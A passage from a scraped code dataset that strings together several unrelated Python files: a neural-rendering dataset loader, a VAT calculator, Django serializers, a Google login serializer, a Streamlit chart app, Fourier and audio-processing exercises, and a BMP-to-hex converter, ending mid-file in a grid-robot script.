zip(self.scale_mats_np, self.world_mats_np):\n P = world_mat @ scale_mat\n P = P[:3, :4]\n intrinsics, pose = load_K_Rt_from_P(None, P)\n self.intrinsics_all.append(torch.from_numpy(intrinsics).float())\n self.pose_all.append(torch.from_numpy(pose).float())\n self.proj_all.append(torch.from_numpy(P).float())\n\n self.images = torch.from_numpy(self.images_np.astype(np.float32)).cpu() # [n_images, H, W, 3]\n self.masks = torch.from_numpy(self.masks_np.astype(np.float32)).cpu() # [n_images, H, W, 3]\n self.errors = self.masks[:, :, :, :1].clone()\n self.errors = F.interpolate(self.errors.permute(0, 3, 1, 2), (self.images.shape[1] // 8, self.images.shape[2] // 8), mode='bilinear')\n self.errors = F.max_pool2d(self.errors, 7, stride=1, padding=3)\n self.errors = self.errors.permute(0, 2, 3, 1)\n self.radius = torch.zeros(self.masks.shape[0], self.masks.shape[2], self.masks.shape[1], 1) # [n_images, W, H, 3]\n \n self.intrinsics_all = torch.stack(self.intrinsics_all).to(self.device) # [n_images, 4, 4]\n self.intrinsics_all_inv = torch.inverse(self.intrinsics_all) # [n_images, 4, 4]\n self.focal = self.intrinsics_all[0][0, 0]\n self.pose_all = torch.stack(self.pose_all).to(self.device) # [n_images, 4, 4]\n self.proj_all = torch.stack(self.proj_all).to(self.device)\n self.H, self.W = self.images.shape[1], self.images.shape[2]\n self.image_pixels = self.H * self.W\n self.fid_all = torch.stack(self.fid_list).to(self.device)\n self.time_emb_list = (self.fid_all / self.n_frames * 2) - 0.95\n\n object_bbox_min = np.array([-1.01, -1.01, -1.01, 1.0])\n object_bbox_max = np.array([ 1.01, 1.01, 1.01, 1.0])\n # Object scale mat: region of interest to **extract mesh**\n object_scale_mat = np.load(os.path.join(self.data_dir, self.object_cameras_name))['scale_mat_0']\n object_bbox_min = np.linalg.inv(self.scale_mats_np[0]) @ object_scale_mat @ object_bbox_min[:, None]\n object_bbox_max = np.linalg.inv(self.scale_mats_np[0]) @ object_scale_mat @ object_bbox_max[:, None]\n self.object_bbox_min = object_bbox_min[:3, 0]\n self.object_bbox_max = object_bbox_max[:3, 0]\n self.process_radius()\n\n print('Load data: End')\n\n def process_radius(self):\n for img_idx in tqdm(range(self.images.shape[0])):\n tx = torch.linspace(0, self.W - 1, self.W, device=self.device)\n ty = torch.linspace(0, self.H - 1, self.H, device=self.device)\n pixels_x, pixels_y = torch.meshgrid(tx, ty)\n p = torch.stack([pixels_x, pixels_y, torch.ones_like(pixels_y)], dim=-1) # W, H, 3\n rays_v = torch.matmul(self.intrinsics_all_inv[img_idx, None, None, :3, :3], p[:, :, :, None]).squeeze() # W, H, 3\n rays_v = torch.matmul(self.pose_all[img_idx, None, None, :3, :3], rays_v[:, :, :, None]).squeeze() # W, H, 3\n dx = torch.sqrt(torch.sum((rays_v[:-1, :, :] - rays_v[1:, :, :]) ** 2, dim=-1))\n dx = torch.cat([dx, dx[-2:-1, :]], dim=0)\n # Cut the distance in half, and then round it out so that it's\n # halfway between inscribed by / circumscribed about the pixel.\n radii = dx[..., None] * 2 / np.sqrt(12)\n self.radius[img_idx] = radii.detach().cpu() # W H 3\n\n def gen_rays_at(self, img_idx, resolution_level=1):\n \"\"\"\n Generate rays at world space from one camera.\n \"\"\"\n l = resolution_level\n tx = torch.linspace(0, self.W - 1, self.W // l, device=self.device)\n ty = torch.linspace(0, self.H - 1, self.H // l, device=self.device)\n pixels_x, pixels_y = torch.meshgrid(tx, ty)\n p = torch.stack([pixels_x, pixels_y, torch.ones_like(pixels_y)], dim=-1) # W, H, 3\n rays_v = torch.matmul(self.intrinsics_all_inv[img_idx, None, None, :3, :3], p[:, :, :, None]).squeeze() # W, H, 3\n rays_v = torch.matmul(self.pose_all[img_idx, None, None, :3, :3], rays_v[:, :, :, None]).squeeze() # W, H, 3\n dx = torch.sqrt(torch.sum((rays_v[:-1, :, :] - rays_v[1:, :, :]) ** 2, dim=-1))\n dx = torch.cat([dx, dx[-2:-1, :]], dim=0)\n rays_r = dx[..., None] * 2 / np.sqrt(12)\n rays_o = self.pose_all[img_idx, None, None, :3, 3].expand(rays_v.shape) # W, H, 3\n rays_v = rays_v / torch.linalg.norm(rays_v, ord=2, dim=-1, keepdim=True) # W, H, 3\n return rays_o.transpose(0, 1), rays_v.transpose(0, 1), rays_r.transpose(0, 1)\n\n def gen_random_rays_at(self, img_idx, batch_size):\n \"\"\"\n Generate random rays at world space from one camera.\n \"\"\"\n error = self.errors[img_idx].reshape(-1).numpy()\n max_error = np.max(error) + 1e-8\n error = error / max_error\n error[error < 0.1] = 0.1\n error = error / np.sum(error)\n index = np.arange(0, self.W*self.H // 64)\n select_index = np.random.choice(index, size=[batch_size], p=error)\n pixels_y = torch.LongTensor(select_index // (self.W // 8)) * 8\n pixels_y += torch.randint_like(pixels_y, 8)\n pixels_x = torch.LongTensor(select_index % (self.W // 8)) * 8\n pixels_x += torch.randint_like(pixels_x, 8)\n\n color = self.images[img_idx][(pixels_y, pixels_x)] # batch_size, 3\n mask = self.masks[img_idx][(pixels_y, pixels_x)] # batch_size, 3\n rays_r = self.radius[img_idx][(pixels_x, pixels_y)] # batch_size, 1\n p = torch.stack([pixels_x, pixels_y, torch.ones_like(pixels_y)], dim=-1).float().to(self.device) # batch_size, 3\n p = torch.matmul(self.intrinsics_all_inv[img_idx, None, :3, :3], p[:, :, None]).squeeze() # batch_size, 3\n rays_v = p / torch.linalg.norm(p, ord=2, dim=-1, keepdim=True) # batch_size, 3\n rays_v = torch.matmul(self.pose_all[img_idx, None, :3, :3], rays_v[:, :, None]).squeeze() # batch_size, 3\n rays_o = self.pose_all[img_idx, None, :3, 3].expand(rays_v.shape) # batch_size, 3\n return torch.cat([rays_o.cpu(), rays_v.cpu(), color.cpu(), mask[:, :1].cpu(), rays_r.cpu()], dim=-1).cuda(), pixels_y.cpu(), pixels_x.cpu() # batch_size, 10\n\n def gen_rays_between(self, idx_0, idx_1, ratio, resolution_level=1):\n \"\"\"\n Interpolate pose between two cameras.\n \"\"\"\n l = resolution_level\n tx = torch.linspace(0, self.W - 1, self.W // l, device=self.device)\n ty = torch.linspace(0, self.H - 1, self.H // l, device=self.device)\n pixels_x, pixels_y = torch.meshgrid(tx, ty)\n p = torch.stack([pixels_x, pixels_y, torch.ones_like(pixels_y)], dim=-1) # W, H, 3\n rays_v = torch.matmul(self.intrinsics_all_inv[0, None, None, :3, :3], p[:, :, :, None]).squeeze() # W, H, 3\n trans = self.pose_all[idx_0, :3, 3] * (1.0 - ratio) + self.pose_all[idx_1, :3, 3] * ratio\n pose_0 = self.pose_all[idx_0].detach().cpu().numpy()\n pose_1 = self.pose_all[idx_1].detach().cpu().numpy()\n pose_0 = np.linalg.inv(pose_0)\n pose_1 = np.linalg.inv(pose_1)\n rot_0 = pose_0[:3, :3]\n rot_1 = pose_1[:3, :3]\n rots = Rot.from_matrix(np.stack([rot_0, rot_1]))\n key_times = [0, 1]\n slerp = Slerp(key_times, rots)\n rot = slerp(ratio)\n pose = np.diag([1.0, 1.0, 1.0, 1.0])\n pose = pose.astype(np.float32)\n pose[:3, :3] = rot.as_matrix()\n pose[:3, 3] = ((1.0 - ratio) * pose_0 + ratio * pose_1)[:3, 3]\n pose = np.linalg.inv(pose)\n rot = torch.from_numpy(pose[:3, :3]).cuda()\n trans = torch.from_numpy(pose[:3, 3]).cuda()\n rays_v = torch.matmul(rot[None, None, :3, :3], rays_v[:, :, :, None]).squeeze() # W, H, 3\n dx = torch.sqrt(torch.sum((rays_v[:-1, :, :] - rays_v[1:, :, :]) ** 2, dim=-1))\n dx = torch.cat([dx, dx[-2:-1, :]], dim=0)\n rays_r = dx[..., None] * 2 / np.sqrt(12)\n rays_v = rays_v / torch.linalg.norm(rays_v, ord=2, dim=-1, keepdim=True) # W, H, 3\n rays_o = trans[None, None, :3].expand(rays_v.shape) # W, H, 3\n return rays_o.transpose(0, 1), rays_v.transpose(0, 1), rays_r.transpose(0, 1)\n\n def near_far_from_sphere(self, rays_o, rays_d):\n if self.near > 0:\n return self.near, self.far\n a = torch.sum(rays_d**2, dim=-1, keepdim=True)\n b = 2.0 * torch.sum(rays_o * rays_d, dim=-1, keepdim=True)\n mid = 0.5 * (-b) / a\n near = mid - 1.0\n far = mid + 1.0\n return near, far\n\n def image_at(self, idx, resolution_level):\n img = cv.imread(self.images_lis[idx])\n return (cv.resize(img, (self.W // resolution_level, self.H // resolution_level))).clip(0, 255)\n\n","repo_name":"DSaurus/Tensor4D","sub_path":"models/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":11580,"program_lang":"python","lang":"en","doc_type":"code","stars":155,"dataset":"github-code","pt":"61"} +{"seq_id":"2716118804","text":"def calculoIva(valor):\r\n iva = round(valor * 19 / 100) #línea ? 1\r\n return iva\r\n\r\ndef bruto(valor):\r\n iva = calculoIva(valor) #línea ? 2\r\n bruto = valor + iva\r\n return bruto\r\n\r\ndef descuento(neto, porcentaje):\r\n total = neto - round(neto * porcentaje / 100) #línea ? 3\r\n return total\r\n\r\nprint()\r\nneto = int(input(\"Ingrese el total de la compra: \"))\r\nporcentajeDescuento = int(input(\"Ingrese el total del descuento: \"))\r\nprint()\r\nprint(f\"Total neto: {neto}\")\r\nconDescuento = descuento(neto, porcentajeDescuento)\r\nprint(f\"Total con descuento: {conDescuento}\")\r\nprint(f\"Impuesto: {calculoIva(conDescuento)}\")\r\nprint(f\"Total bruto: {bruto(conDescuento)}\")\r\nprint()","repo_name":"hersairaf/imprep","sub_path":"3.3 2 CalculoIva.py","file_name":"3.3 2 CalculoIva.py","file_ext":"py","file_size_in_byte":684,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"18536135231","text":"from rest_framework import serializers\nfrom utils.serializers import resource_read_only\n\nfrom ..models import Problem\n\nfrom ..models import Limit\nfrom ..models import TestData, ProblemTestData\n\n\nclass ProblemListSerializer(serializers.ModelSerializer):\n class Meta:\n model = Problem\n fields = '__all__'\n read_only_fields = resource_read_only + ('meta_problem',\n 'number_test_data',\n 'number_virtual_judge',\n 'number_decorator',\n 'number_limit',\n 'number_category',\n 'number_node')\n\n def create(self, validated_data):\n description = validated_data['description']\n sample = validated_data['sample']\n meta_problem = validated_data['meta_problem']\n if description is not None and description.meta_problem != meta_problem:\n raise serializers.ValidationError('Cannot choose description from other meta problem.')\n if sample is not None and sample.meta_problem != meta_problem:\n raise serializers.ValidationError('Cannot choose sample from other meta problem.')\n return super().create(validated_data)\n\n\nclass ProblemDetailSerializer(serializers.ModelSerializer):\n class Meta:\n model = Problem\n fields = '__all__'\n read_only_fields = resource_read_only + ('meta_problem',\n 'number_test_data',\n 'number_virtual_judge',\n 'number_decorator',\n 'number_limit',\n 'number_category',\n 'number_node')\n\n def update(self, instance, validated_data):\n description = validated_data['description']\n sample = validated_data['sample']\n meta_problem = instance.meta_problem\n if description is not None and description.meta_problem != meta_problem:\n raise serializers.ValidationError('Cannot choose description from other meta problem.')\n if sample is not None and sample.meta_problem != meta_problem:\n raise serializers.ValidationError('Cannot choose sample from other meta problem.')\n return super().update(instance, validated_data)\n\n\nclass ProblemReadOnlySerializer(serializers.ModelSerializer):\n class Meta:\n model = Problem\n exclude = ('meta_problem',)\n\n\nclass LimitListSerializer(serializers.ModelSerializer):\n class Meta:\n model = Limit\n fields = '__all__'\n read_only_fields = resource_read_only + ('problem',)\n\n\nclass LimitDetailSerializer(serializers.ModelSerializer):\n class Meta:\n model = Limit\n fields = '__all__'\n read_only_fields = resource_read_only + ('problem',)\n\n\nclass TestDataSerializer(serializers.ModelSerializer):\n class Meta:\n model = TestData\n fields = '__all__'\n\n\nclass TestDataRelationSerializer(serializers.ModelSerializer):\n class Meta:\n model = ProblemTestData\n fields = '__all__'\n read_only_fields = resource_read_only + ('problem',)\n\n def create(self, validated_data):\n test_data = validated_data['test_data']\n problem = validated_data['problem']\n meta_problem = problem.meta_problem\n print(test_data.meta_problem, meta_problem)\n if test_data is not None and test_data.meta_problem != meta_problem:\n raise serializers.ValidationError('Cannot choose test data from other meta problem.')\n if ProblemTestData.objects.filter(problem=problem, test_data=test_data).exists():\n raise serializers.ValidationError('Relation already exists.')\n return super().create(validated_data)\n","repo_name":"GuoDuanLZ/sdustoj-judge-webserver","sub_path":"sdustoj_server/problem/api_server/problem_serializers.py","file_name":"problem_serializers.py","file_ext":"py","file_size_in_byte":4014,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"17206920214","text":"from django.conf import settings\nfrom rest_framework import serializers\nfrom library.sociallib import google\nfrom library.register.register import register_social_user\nfrom rest_framework.exceptions import AuthenticationFailed\n\nclass GoogleSocialAuthSerializer(serializers.Serializer):\n auth_token = serializers.CharField()\n\n def validate_auth_token(self, auth_token):\n user_data = google.Google.validate(auth_token)\n try:\n user_data['sub']\n except:\n raise serializers.ValidationError(\n 'The token is invalid or expired. Please login again.'\n )\n # print(user_data['aud'])\n if user_data['aud'] != settings.GOOGLE_CLIENT_ID:\n\n raise AuthenticationFailed('oops, who are you?')\n\n email = user_data['email']\n name = user_data['name']\n provider = 'google'\n\n return register_social_user(\n provider=provider, email=email, name=name)","repo_name":"ianfshirley/JobHuntHQ-API","sub_path":"accounts/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":963,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"42816172132","text":"import streamlit as st\nimport pandas as pd\nimport plotly.express as px\n\nst.title(\"In Search for Happiness\")\ndf = pd.read_csv(\"happy.csv\")\n\nx_axis = st.selectbox(\"Select the data for X axis\", options=df.columns)\ny_axis = st.selectbox(\"Select the data for Y axis\", options=df.columns)\n\n\nst.header(f\"{x_axis} and {y_axis}\")\n\nfigure = px.scatter(data_frame=df, x=x_axis, y=y_axis)\nst.plotly_chart(figure)\n","repo_name":"Chandrakanth0698/codingexerices","sub_path":"happyness_app.py","file_name":"happyness_app.py","file_ext":"py","file_size_in_byte":401,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"9812223070","text":"import numpy as np\nimport scipy.io.wavfile as wv\nfrom scipy import signal\nfrom scipy.ndimage.interpolation import map_coordinates\nimport imageio\nfrom skimage.color import rgb2gray\n# import matplotlib.pyplot as plt\n# import pandas as pd\n\n\n\n\ndef init_DFT_natrix(N):\n \"\"\" initiate DFT matrix of size N x N\"\"\"\n u = x = np.arange(N)\n # u = x = np.arange(-np.floor(N / 2), np.ceil(N / 2))\n ux = np.outer(x, u)\n i = np.complex(0, 1)\n DFT_mat = np.cos((2 * np.pi * ux) / N) - i * np.sin((2 * np.pi * ux) / N)\n return DFT_mat\n\n\ndef init_IDFT_natrix(N):\n \"\"\" initiate DFT matrix of size N x N\"\"\"\n u = x = np.arange(N)\n # u = x = np.arange(-np.floor(N / 2), np.ceil(N / 2))\n ux = np.outer(x, u)\n i = np.complex(0, 1)\n IDFT_mat = np.cos((2 * np.pi * ux) / N) + i * np.sin((2 * np.pi * ux) / N)\n return IDFT_mat / N\n\n\ndef DFT(signal):\n \"\"\" this function transforms a 1D discrete signal to its 1D Fourier representation \"\"\"\n DFT_mat = init_DFT_natrix(signal.shape[0])\n return np.dot(DFT_mat, signal)\n\n\ndef IDFT(fourier_signal):\n \"\"\" this function transforms a 1D Fourier representation to its 1D discrete signal \"\"\"\n IDFT_mat = init_IDFT_natrix(fourier_signal.shape[0])\n return np.dot(IDFT_mat, fourier_signal)\n\n\ndef DFT2(image):\n \"\"\" this function transforms a 2D discrete signal to its 2D Fourier representation \"\"\"\n extra_dim = len(image.shape) == 3\n DFT_mat_1 = init_DFT_natrix(image.shape[0])\n DFT_mat_2 = init_DFT_natrix(image.shape[1])\n if extra_dim:\n image = image[:, :, 0]\n first_DFT = np.dot(DFT_mat_1, image)\n second_DFT = np.dot(DFT_mat_2, first_DFT.transpose())\n result = second_DFT.transpose()\n if extra_dim:\n result = result[..., np.newaxis]\n return result\n\n\ndef IDFT2(fourier_image):\n \"\"\" this function transforms a 2D Fourier representation to its 2D discrete signal \"\"\"\n extra_dim = len(fourier_image.shape) == 3\n DFT_mat_1 = init_IDFT_natrix(fourier_image.shape[0])\n DFT_mat_2 = init_IDFT_natrix(fourier_image.shape[1])\n if extra_dim:\n fourier_image = fourier_image[:, :, 0]\n first_DFT = np.dot(DFT_mat_1, fourier_image)\n second_DFT = np.dot(DFT_mat_2, first_DFT.transpose())\n result = second_DFT.transpose()\n if extra_dim:\n result = result[..., np.newaxis]\n return result\n\n\ndef change_rate(filename, ratio):\n \"\"\" this function creates new wav file with duration time of original_duration/ratio \"\"\"\n orig_wav = wv.read(filename)\n wv.write(\"change_rate.wav\", int(orig_wav[0] * ratio), orig_wav[1])\n\n\ndef change_samples(filename, ratio):\n \"\"\" this function creates new wav file with same rate but different samples \"\"\"\n rate, samples = wv.read(filename)\n new_samples = resize(samples, ratio).real\n wv.write(\"change_samples.wav\", rate, new_samples)\n return new_samples\n\n\ndef resize(data, ratio):\n \"\"\" this function returns resized data by ratio\"\"\"\n fourier = DFT(data)\n shifted_f = np.fft.fftshift(fourier)\n # shifted_f = fourier\n if ratio > 1:\n resized = clip_high_freq(shifted_f, ratio)\n elif ratio < 1:\n resized = pad_with_zeros(shifted_f, ratio)\n else:\n return data.astype('float64')\n shifted_back = np.fft.ifftshift(resized)\n # shifted_back = resized\n return IDFT(shifted_back)\n\n\ndef clip_high_freq(data, ratio):\n \"\"\" this function clips high frequencies from data according to ratio \"\"\"\n N = data.shape[0]\n new_N = int(N / ratio)\n diff = N - new_N\n left = int(np.ceil(diff / 2))\n right = N - int(np.floor(diff / 2))\n return data[left: right]\n\ndef pad_with_zeros(data, ratio):\n \"\"\" this function pads data with zeros according to ratio \"\"\"\n N = data.shape[0]\n new_N = int(N/ratio)\n diff = new_N - N\n left = int(np.floor(diff/2))\n right = int(np.ceil(diff/2))\n return np.concatenate([np.zeros(left), data, np.zeros(right)])\n\n\ndef resize_spectrogram(data, ratio):\n \"\"\"this function resizes data spectogram\"\"\"\n spectrogram = stft(data)\n new_spectrogram = np.apply_along_axis(resize, 1, spectrogram, ratio)\n return istft(new_spectrogram)\n\n\ndef resize_vocoder(data, ratio):\n spectrogram = stft(data)\n return istft(phase_vocoder(spectrogram, ratio))\n\n\ndef conv_der(im):\n x_der_conv = np.array([[0.5, 0, -0.5]])\n y_der_conv = x_der_conv.transpose()\n im_x_derived = signal.convolve2d(im, x_der_conv, mode='same')\n im_y_derived = signal.convolve2d(im, y_der_conv, mode='same')\n magnitude = np.sqrt(np.abs(im_x_derived) ** 2 + np.abs(im_y_derived) ** 2)\n return magnitude\n\n\ndef fourier_der(im):\n im_x_derived = fourier_der_by_axis(im, 0)\n im_y_derived = fourier_der_by_axis(im, 1)\n magnitude = np.sqrt(np.abs(im_x_derived) ** 2 + np.abs(im_y_derived) ** 2)\n return magnitude\n\n\ndef fourier_der_by_axis(im, axis):\n fourier = DFT2(im)\n shifted_fourier = np.fft.fftshift(fourier)\n # shifted_fourier = fourier\n if axis == 0:\n multiplied = multiply_rows(shifted_fourier)\n multiplied *= (2 * np.pi)/im.shape[0]\n else:\n multiplied = multiply_columns(shifted_fourier)\n multiplied *= (2 * np.pi) / im.shape[1]\n shifted_back = np.fft.ifftshift(multiplied)\n # shifted_back = multiplied\n return IDFT2(shifted_back)\n\n\ndef multiply_rows(mat):\n N = mat.shape[0]\n vec = np.arange(-np.floor(N/2), np.ceil(N/2)).transpose()\n vec = vec[..., np.newaxis]\n return mat * vec\n\n\ndef multiply_columns(mat):\n N = mat.shape[1]\n vec = np.arange(-np.floor(N/2), np.ceil(N/2)).transpose()\n vec = vec[..., np.newaxis]\n return (mat.transpose() * vec).transpose()\n\n\ndef stft(y, win_length=640, hop_length=160):\n fft_window = signal.windows.hann(win_length, False)\n\n # Window the time series.\n n_frames = 1 + (len(y) - win_length) // hop_length\n frames = [y[s:s + win_length] for s in np.arange(n_frames) * hop_length]\n\n stft_matrix = np.fft.fft(fft_window * frames, axis=1)\n return stft_matrix.T\n\n\ndef istft(stft_matrix, win_length=640, hop_length=160):\n n_frames = stft_matrix.shape[1]\n y_rec = np.zeros(win_length + hop_length * (n_frames - 1), dtype=np.float)\n ifft_window_sum = np.zeros_like(y_rec)\n\n ifft_window = signal.windows.hann(win_length, False)[:, np.newaxis]\n win_sq = ifft_window.squeeze() ** 2\n\n # invert the block and apply the window function\n ytmp = ifft_window * np.fft.ifft(stft_matrix, axis=0).real\n\n for frame in range(n_frames):\n frame_start = frame * hop_length\n frame_end = frame_start + win_length\n y_rec[frame_start: frame_end] += ytmp[:, frame]\n ifft_window_sum[frame_start: frame_end] += win_sq\n\n # Normalize by sum of squared window\n y_rec[ifft_window_sum > 0] /= ifft_window_sum[ifft_window_sum > 0]\n return y_rec\n\n\ndef phase_vocoder(spec, ratio):\n time_steps = np.arange(spec.shape[1]) * ratio\n time_steps = time_steps[time_steps < spec.shape[1]]\n\n # interpolate magnitude\n yy = np.meshgrid(np.arange(time_steps.size), np.arange(spec.shape[0]))[1]\n xx = np.zeros_like(yy)\n coordiantes = [yy, time_steps + xx]\n warped_spec = map_coordinates(np.abs(spec), coordiantes, mode='reflect', order=1).astype(np.complex)\n\n # phase vocoder\n # Phase accumulator; initialize to the first sample\n spec_angle = np.pad(np.angle(spec), [(0, 0), (0, 1)], mode='constant')\n phase_acc = spec_angle[:, 0]\n\n for (t, step) in enumerate(np.floor(time_steps).astype(np.int)):\n # Store to output array\n warped_spec[:, t] *= np.exp(1j * phase_acc)\n\n # Compute phase advance\n dphase = (spec_angle[:, step + 1] - spec_angle[:, step])\n\n # Wrap to -pi:pi range\n dphase = np.mod(dphase - np.pi, 2 * np.pi) - np.pi\n\n # Accumulate phase\n phase_acc += dphase\n\n return warped_spec\n\n\ndef read_image(filename, representation):\n \"\"\"\n this function reads an image file and converts it into a given representation\n :param filename: image to process\n :param representation: 1 for gray scale, 2 for rgb\n :return: image from filename represented in the given representation\n \"\"\"\n img = imageio.imread(filename)\n if np.amax(img) > 1:\n img = img / (256 - 1) # normalized if needed\n dim = len(img.shape)\n if representation == 1 and dim == 3:\n return rgb2gray(img)\n else:\n return img\n\n\ndef pad_filter_with_zeros(filter, shape):\n \"\"\" this function pads a filter to the size of shape - for my tests\"\"\"\n zeros = np.zeros((shape[0], shape[1]))\n x = int((shape[0]-filter.shape[0])/2)\n y = int((shape[1]-filter.shape[1])/2)\n zeros[x :x + filter.shape[0],y :y+filter.shape[1]] = filter\n return zeros\n\n\ndef create_big_filter(little_filter, size):\n \"\"\" this function returns filter that is like little_filter only 'size' times bigger - for my tests\"\"\"\n new_filter = np.zeros((little_filter.shape[0] * size, little_filter.shape[1] * size))\n for i in range(little_filter.shape[0]):\n for j in range(little_filter.shape[1]):\n cube = np.ones((size, size)) * little_filter[i][j]\n new_filter[i*size:(i+1)*size, j*size:(j+1)*size] = cube\n return new_filter\n\n# MY TESTS\n# if __name__ == '__main__':\n# # show image\n# filename = '/Users/ellaby/Documents/year D/image_processing/exes/ex2-ellaby/external/city.jpg'\n# im = read_image(filename, 1)\n# plt.imshow(im, cmap=plt.cm.gray)\n# plt.show()\n#\n# # fourier image\n# fourier = DFT2(im)\n# plt.imshow(fourier.real, cmap=plt.cm.gray)\n# plt.show()\n#\n# # double fourier image\n# fourier2 = DFT2(fourier)\n# plt.imshow(fourier2.real, cmap=plt.cm.gray)\n# plt.show()\n#\n# # possible filters\n# filt_ones = np.ones((1, 1))\n# filt_der_x = np.array([[-1, 0, 1]])\n# filt_der_y = np.array([[-1], [0], [1]])\n# filt_sum_der_x_der_y = filt_der_x + filt_der_y\n#\n# # convolution with filter\n# filt = create_big_filter(filt_ones, 20)\n# convolved = signal.convolve2d(im, filt, boundary='symm', mode='same')\n# plt.imshow(convolved, cmap=plt.cm.gray)\n# plt.show()\n#\n# # show filter padded with seros\n# padded_filt = pad_filter_with_zeros(filt, im.shape)\n# plt.imshow(padded_filt, cmap=plt.cm.gray)\n# plt.show()\n#\n# # DFT to filter\n# F_filt = DFT2(padded_filt.real)\n# plt.imshow(np.abs(F_filt), cmap=plt.cm.gray)\n# plt.show()\n#\n# F_im = DFT2(im)\n# mult = F_filt * F_im\n# new_im = IDFT2(mult)\n# # need do shift.....\n# new_im = np.fft.fftshift(new_im)\n# plt.imshow(new_im.real, cmap=plt.cm.gray)\n# plt.show()\n\n","repo_name":"EllaBarYaacov/Image-processing","sub_path":"ex2-ellaby/sol2.py","file_name":"sol2.py","file_ext":"py","file_size_in_byte":10584,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"4452451996","text":"import array\nimport math\nimport os\nimport sys\nfrom PIL import Image\nimport cv2\nimport ast\n\nresult_h2x = []\n\n\nclass DEFAULTS(object):\n STRUCTURE_NAME = 'GFXMeta'\n VERSION = '2.3'\n\n\ndef getLONG(a, n):\n return (a[n + 3] * (2 ** 24)) + (a[n + 2] * (2 ** 16)) + (a[n + 1] * (2 ** 8)) + (a[n])\n\n\n# Utility function. Return an int from array (little endian)\ndef getINT(a, n):\n return (a[n + 1] * (2 ** 8)) + (a[n])\n\n\n# Reverses pixels in byte\ndef reflect(a):\n r = 0\n for i in range(8):\n r <<= 1\n r |= (a & 0x01)\n a >>= 1\n return r\n\n\n# Main conversion function\ndef bmp2hex(infile, tablewidth, sizebytes, invert, raw, named, double, xbm):\n # Set the table name to the uppercase root of the file name\n tablename = os.path.splitext(infile)[0].upper()\n\n # Convert tablewidth to characters from hex bytes\n tablewidth = int(tablewidth) * 6\n\n # Initilize output buffer\n outstring = ''\n\n # Open File\n fin = open(os.path.expanduser(infile), \"rb\")\n uint8_tstoread = os.path.getsize(os.path.expanduser(infile))\n valuesfromfile = array.array('B')\n try:\n valuesfromfile.fromfile(fin, uint8_tstoread)\n finally:\n fin.close()\n\n # Get bytes from file\n values = valuesfromfile.tolist()\n\n # Exit if it's not a Windows BMP\n if (values[0] != 0x42) or (values[1] != 0x4D):\n sys.exit(\"Error: Unsupported BMP format. Make sure your file is a Windows BMP.\")\n\n # Calculate width, heigth\n dataOffset = getLONG(values, 10) # Offset to image data\n pixelWidth = getLONG(values, 18) # Width of image\n pixelHeight = getLONG(values, 22) # Height of image\n bitDepth = getINT(values, 28) # Bits per pixel\n dataSize = getLONG(values, 34) # Size of raw data\n\n # Calculate line width in bytes and padded byte width (each row is padded to 4-byte multiples)\n byteWidth = int(math.ceil(float(pixelWidth * bitDepth) / 8.0))\n paddedWidth = int(math.ceil(float(byteWidth) / 4.0) * 4.0)\n\n # For auto (sizebytes = 0), set sizebytes to 1 or 2, depending on size of the bitmap\n if sizebytes == 0:\n if (pixelWidth > 255) or (pixelHeight > 255):\n sizebytes = 2\n else:\n sizebytes = 1\n\n # The invert byte is set based on the invert command line flag (but, the logic is reversed for 1-bit files)\n invertbyte = 0xFF if invert else 0x00\n if bitDepth == 1:\n invertbyte = invertbyte ^ 0xFF\n try:\n for i in range(pixelHeight):\n for j in range(byteWidth):\n ndx = dataOffset + ((pixelHeight - 1 - i) * paddedWidth) + j\n v = values[ndx] ^ invertbyte\n if xbm:\n v = reflect(v)\n # print (\"{0:#04x}\".format(v))\n outstring += \"{0:#04x}\".format(v) + \", \"\n result_h2x.append(v)\n finally:\n return result_h2x\n\n\n# ---------------------------------------------------------------------------------------------------\n\n# 转灰度\ndef conv2(imagePath, savePath):\n im = Image.open(imagePath)\n im.convert(mode=\"L\").save(savePath)\n\n\n# 转1位图\ndef conv3(imagePath, savePath):\n im = Image.open(imagePath)\n im.convert(mode=\"1\").save(savePath)\n\n\n# 二值化\ndef conv4(imagePath, savePath):\n img = cv2.imread(imagePath, 0)\n # blur = cv2.GaussianBlur(img, (5, 5), 0)\n thresh = cv2.adaptiveThreshold(img, 255, cv2.ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY, 25, 10)\n cv2.imwrite(savePath, thresh)\n\n\n# 转码\ndef createCode(imgPath):\n ra = bmp2hex(imgPath, \"0\", \"0\", False, False, False, False, True)\n return ra\n\n\n# 帧的字码文件转换成数组\ndef fileH2xToList(filePath):\n data = open(filePath, 'r')\n res = data.read()\n data.close()\n r2es = res.strip('[')\n r3es = r2es.strip(']')\n arr = r3es.split(',')\n a2rr = list(map(int, arr))\n return a2rr\n\n\n# fc文件转换成字典\ndef flTodic(flPath):\n data = open(flPath, 'r')\n res = data.read()\n data.close()\n result_dic = ast.literal_eval(res)\n return result_dic\n\n\n# fc帧文件转换成数组\ndef flH2xToList(flvalue):\n r2es = flvalue.strip('[')\n r3es = r2es.strip(']')\n arr = r3es.split(',')\n a2rr = list(map(int, arr))\n return a2rr\n\n","repo_name":"icomgx/esp32_p2layer","sub_path":"conv.py","file_name":"conv.py","file_ext":"py","file_size_in_byte":4224,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"61"} +{"seq_id":"2100948021","text":"N,M = map(int,input().split())\n\ncurrent_X,current_Y,D = map(int,input().split())\n\nFiled = [[int(x) for x in input().split()] for _ in range(N)]\n\ncheck = [[0]*M for j in range(N)]\nresult = 0\ncount = 0\n\n\nLeft = [(0,-1),(0,-1),(0,1),(1,0)] \nBack = [(1,0),(0,-1),(-1,0),(0,1)]\ncheck =Filed\ncheck[current_Y][current_X] = 1\nresult += 1\nprint(Filed)\nprint(check)\n\nwhile(1) :\n print (\"Direction :\" , D)\n if Filed[current_X + Left[D][0]][current_Y + Left[D][1]] == 0 and check[current_X+Left[D][0]][current_Y + Left[D][1]] == 0:\n current_X = current_X + Left[D][0]\n current_Y = current_Y + Left[D][1]\n D -= 